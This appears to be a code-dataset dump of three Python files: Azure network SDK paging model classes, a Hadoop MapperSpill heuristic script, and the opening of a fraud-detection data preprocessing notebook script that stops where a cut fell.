{\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCrossConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCrossConnectionPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCrossConnectionPeeringPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCrossConnectionPeering ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCrossConnectionPeering]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCrossConnectionPeeringPaged, self).__init__(*args, **kwargs)\nclass ExpressRoutePortsLocationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRoutePortsLocation ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRoutePortsLocation]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRoutePortsLocationPaged, self).__init__(*args, **kwargs)\nclass ExpressRoutePortPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRoutePort ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRoutePort]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRoutePortPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteLinkPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteLink ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteLink]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteLinkPaged, self).__init__(*args, **kwargs)\nclass FirewallPolicyPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`FirewallPolicy ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[FirewallPolicy]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(FirewallPolicyPaged, self).__init__(*args, **kwargs)\nclass FirewallPolicyRuleGroupPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`FirewallPolicyRuleGroup ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[FirewallPolicyRuleGroup]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(FirewallPolicyRuleGroupPaged, self).__init__(*args, **kwargs)\nclass IpGroupPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`IpGroup ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[IpGroup]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(IpGroupPaged, self).__init__(*args, **kwargs)\nclass LoadBalancerPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`LoadBalancer ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[LoadBalancer]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(LoadBalancerPaged, self).__init__(*args, **kwargs)\nclass BackendAddressPoolPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`BackendAddressPool ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[BackendAddressPool]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(BackendAddressPoolPaged, self).__init__(*args, **kwargs)\nclass FrontendIPConfigurationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`FrontendIPConfiguration ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[FrontendIPConfiguration]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(FrontendIPConfigurationPaged, self).__init__(*args, **kwargs)\nclass InboundNatRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`InboundNatRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[InboundNatRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(InboundNatRulePaged, self).__init__(*args, **kwargs)\nclass LoadBalancingRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`LoadBalancingRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[LoadBalancingRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(LoadBalancingRulePaged, self).__init__(*args, **kwargs)\nclass OutboundRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`OutboundRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[OutboundRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(OutboundRulePaged, self).__init__(*args, **kwargs)\nclass NetworkInterfacePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkInterface ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkInterface]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkInterfacePaged, self).__init__(*args, **kwargs)\nclass ProbePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Probe ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Probe]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ProbePaged, self).__init__(*args, **kwargs)\nclass NatGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NatGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NatGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NatGatewayPaged, self).__init__(*args, **kwargs)\nclass NetworkInterfaceIPConfigurationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkInterfaceIPConfiguration ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkInterfaceIPConfiguration]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkInterfaceIPConfigurationPaged, self).__init__(*args, **kwargs)\nclass NetworkInterfaceTapConfigurationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkInterfaceTapConfiguration ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkInterfaceTapConfiguration]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkInterfaceTapConfigurationPaged, self).__init__(*args, **kwargs)\nclass NetworkProfilePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkProfile ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkProfile]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkProfilePaged, self).__init__(*args, **kwargs)\nclass NetworkSecurityGroupPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkSecurityGroup ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkSecurityGroup]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkSecurityGroupPaged, self).__init__(*args, **kwargs)\nclass SecurityRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`SecurityRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[SecurityRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(SecurityRulePaged, self).__init__(*args, **kwargs)\nclass NetworkWatcherPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkWatcher ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkWatcher]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkWatcherPaged, self).__init__(*args, **kwargs)\nclass PacketCaptureResultPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PacketCaptureResult ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PacketCaptureResult]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PacketCaptureResultPaged, self).__init__(*args, **kwargs)\nclass ConnectionMonitorResultPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ConnectionMonitorResult ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ConnectionMonitorResult]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ConnectionMonitorResultPaged, self).__init__(*args, **kwargs)\nclass OperationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Operation ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Operation]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(OperationPaged, self).__init__(*args, **kwargs)\nclass PrivateEndpointPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PrivateEndpoint ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PrivateEndpoint]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PrivateEndpointPaged, self).__init__(*args, **kwargs)\nclass AvailablePrivateEndpointTypePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AvailablePrivateEndpointType ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AvailablePrivateEndpointType]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AvailablePrivateEndpointTypePaged, self).__init__(*args, **kwargs)\nclass PrivateLinkServicePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PrivateLinkService ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PrivateLinkService]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PrivateLinkServicePaged, self).__init__(*args, **kwargs)\nclass PrivateEndpointConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PrivateEndpointConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PrivateEndpointConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PrivateEndpointConnectionPaged, self).__init__(*args, **kwargs)\nclass AutoApprovedPrivateLinkServicePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AutoApprovedPrivateLinkService ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AutoApprovedPrivateLinkService]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AutoApprovedPrivateLinkServicePaged, self).__init__(*args, **kwargs)\nclass PublicIPAddressPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PublicIPAddress ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PublicIPAddress]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PublicIPAddressPaged, self).__init__(*args, **kwargs)\nclass PublicIPPrefixPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PublicIPPrefix ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PublicIPPrefix]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PublicIPPrefixPaged, self).__init__(*args, **kwargs)\nclass RouteFilterPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`RouteFilter ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[RouteFilter]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(RouteFilterPaged, self).__init__(*args, **kwargs)\nclass RouteFilterRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`RouteFilterRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[RouteFilterRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(RouteFilterRulePaged, self).__init__(*args, **kwargs)\nclass RouteTablePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`RouteTable ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[RouteTable]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(RouteTablePaged, self).__init__(*args, **kwargs)\nclass RoutePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Route ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Route]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(RoutePaged, self).__init__(*args, **kwargs)\nclass BgpServiceCommunityPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`BgpServiceCommunity ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[BgpServiceCommunity]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(BgpServiceCommunityPaged, self).__init__(*args, **kwargs)\nclass ServiceEndpointPolicyPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ServiceEndpointPolicy ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ServiceEndpointPolicy]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ServiceEndpointPolicyPaged, self).__init__(*args, **kwargs)\nclass ServiceEndpointPolicyDefinitionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ServiceEndpointPolicyDefinition ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ServiceEndpointPolicyDefinition]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ServiceEndpointPolicyDefinitionPaged, self).__init__(*args, **kwargs)\nclass UsagePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Usage ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Usage]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(UsagePaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetwork ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetwork]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkUsagePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkUsage ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkUsage]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkUsagePaged, self).__init__(*args, **kwargs)\nclass SubnetPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Subnet ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Subnet]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(SubnetPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkPeeringPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkPeering ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkPeering]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkPeeringPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkGatewayPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkGatewayConnectionListEntityPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkGatewayConnectionListEntity ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkGatewayConnectionListEntity]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkGatewayConnectionListEntityPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkGatewayConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkGatewayConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkGatewayConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkGatewayConnectionPaged, self).__init__(*args, **kwargs)\nclass LocalNetworkGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`LocalNetworkGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[LocalNetworkGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(LocalNetworkGatewayPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkTapPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkTap ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkTap]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkTapPaged, self).__init__(*args, **kwargs)\nclass VirtualRouterPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualRouter ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualRouter]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualRouterPaged, self).__init__(*args, **kwargs)\nclass VirtualRouterPeeringPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualRouterPeering ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualRouterPeering]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualRouterPeeringPaged, self).__init__(*args, **kwargs)\nclass VirtualWANPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualWAN ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualWAN]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualWANPaged, self).__init__(*args, **kwargs)\nclass VpnSitePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnSite ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnSite]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnSitePaged, self).__init__(*args, **kwargs)\nclass VpnSiteLinkPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnSiteLink ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnSiteLink]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnSiteLinkPaged, self).__init__(*args, **kwargs)\nclass VpnServerConfigurationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnServerConfiguration ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnServerConfiguration]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnServerConfigurationPaged, self).__init__(*args, **kwargs)\nclass VirtualHubPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualHub ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualHub]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualHubPaged, self).__init__(*args, **kwargs)\nclass HubVirtualNetworkConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`HubVirtualNetworkConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[HubVirtualNetworkConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(HubVirtualNetworkConnectionPaged, self).__init__(*args, **kwargs)\nclass VpnGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnGatewayPaged, self).__init__(*args, **kwargs)\nclass VpnConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnConnectionPaged, self).__init__(*args, **kwargs)\nclass VpnSiteLinkConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnSiteLinkConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnSiteLinkConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnSiteLinkConnectionPaged, self).__init__(*args, **kwargs)\nclass P2SVpnGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`P2SVpnGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[P2SVpnGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(P2SVpnGatewayPaged, self).__init__(*args, **kwargs)\nclass VirtualHubRouteTableV2Paged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualHubRouteTableV2 ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualHubRouteTableV2]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualHubRouteTableV2Paged, self).__init__(*args, **kwargs)\nclass WebApplicationFirewallPolicyPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`WebApplicationFirewallPolicy ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[WebApplicationFirewallPolicy]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(WebApplicationFirewallPolicyPaged, self).__init__(*args, **kwargs)\n","sub_path":"src/connection-monitor-preview/azext_connection_monitor_preview/vendored_sdks/v2019_11_01/v2019_11_01/models/_paged_models.py","file_name":"_paged_models.py","file_ext":"py","file_size_in_byte":38773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"553908610","text":"'''\nCalculates MapperSpll heuristic\nChecks for ratio of SPILLED_RECORDS/MAP_OUTPUT_RECORDS\n'''\nfrom main import *\n\ndef MapperSpill(i):\t\n\theuristic = heuristic_class()\n\tthresh_val = getattr(heuristic,map_threshold)\n\tval = getattr(heuristic,map_value)\n\tinsert= getattr(heuristic,insert_data)\n\t\n\tspill_threshold = float(thresh_val(i,\"SPILLED_RECORDS\"))\n\tmapoutput_threshold = float(thresh_val(i,\"MAP_OUTPUT_RECORDS\"))\n\tspill_record = val(i,\"SPILLED_RECORDS\")\n\tmapoutput= val(i,\"MAP_OUTPUT_RECORDS\")\n\n\t\n\tif mapoutput==0 and mapoutput_threshold==0:\n\t\tratio=0\n\t\tratio_thres=0\n\telif mapoutput!=0 and mapoutput_threshold==0:\n\t\tratio_thres=0\n\t\tratio=spill_record/mapoutput\n\telif mapoutput==0 and mapoutput_threshold!=0:\t\n\t\tratio = 0\n\t\tratio_thres = spill_threshold/mapoutput_threshold\n\telse:\n\t\tratio=spill_record/mapoutput\n\t\tratio_thres = spill_threshold/mapoutput_threshold\n\t\n\tpercent = 0.02*ratio_thres\n\tif ratio_thres-percent <= ratio <= ratio_thres+percent:\n\t\tseverity=\"LOW\"\n\t\tscore=ratio\n\telse:\n\t\tseverity = \"HIGH\"\n\t\tscore=ratio\n\t\n\tinsert(i,score,severity,\"MapperSpill\")\n\tprint (severity,score,i[0],\"MapperSpill\")\n","sub_path":"heuristics/MapperSpill.py","file_name":"MapperSpill.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"650109687","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.3.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# +\nimport pandas as pd\nimport numpy as np\n\nimport sys\nsys.path\n\nsys.path.insert(0, '../classes_functions')\n\nfrom data_processing_class import DataProcessing\n\n# +\n# Train-test-split\ndf_tran = pd.read_csv(\"../data/original_data/train_transaction.csv\", index_col = 'TransactionID')\ndf_id = pd.read_csv(\"../data/original_data/train_identity.csv\", index_col = 'TransactionID')\n\ndf_tot = df_tran.merge(df_id, how = 'left', left_on='TransactionID', right_on='TransactionID')\ndf_train_split = pd.read_csv(\"../data/processed_data/df_train_split.csv\")\ndf_test_split = pd.read_csv(\"../data/processed_data/df_test_split.csv\")\ndf_train_split_pp = DataProcessing(df_train_split, 'isFraud')\ndf_train_split_pp.threshold_col_del(0.25)\n\ndf_train_split_pp.extract_timestamps()\n\nnumerical_cols = []\ncategorical_cols = []\n\nfor col in df_train_split_pp.X.columns:\n if df_train_split_pp.X[col].dtype != 'object':\n numerical_cols.append(col)\n else:\n categorical_cols.append(col)\ndf_train_split_pp.lblencoder()\ndf_train_split_pp.fill_null(categorical_cols, 'mode')\ndf_train_split_pp.fill_null(numerical_cols, 'median')\n\ndf_train_split_pp.balancesample(\"over\")\ndf_train_split_pp.standardiser()\ndf_train_split_pp.pca_reduction(0.95)\ndf_train_split_pp.X.head()\ndf_train_split_ppc = pd.concat([df_train_split_pp.X, df_train_split_pp.y], axis=1, sort=False)\ndf_train_split_ppc.to_csv(\"../data/processed_data/df_train_split_ppc.csv\", index=False)\n\ndf_test_split_pp = DataProcessing(df_test_split, 'isFraud')\ndf_test_split_pp.threshold_col_del(0.25)\ndf_test_split_pp.extract_timestamps()\n\nnumerical_cols = []\ncategorical_cols = []\n\nfor col in df_test_split_pp.X.columns:\n if df_train_split_pp.X[col].dtype != 'object':\n numerical_cols.append(col)\n else:\n categorical_cols.append(col)\ndf_test_split_pp.lblencoder()\ndf_test_split_pp.fill_null(categorical_cols, 'mode')\ndf_test_split_pp.fill_null(numerical_cols, 'median')\ndf_test_split_pp.standardiser()\n\ndf_test_split_pp.X.head()\ndf_test_split_ppc = pd.concat([df_test_split_pp.X, df_test_split_pp.y], axis=1, sort=False)\ndf_test_split_ppc.to_csv(\"../data/processed_data/df_test_split_ppc.csv\", index=False)\n\n# 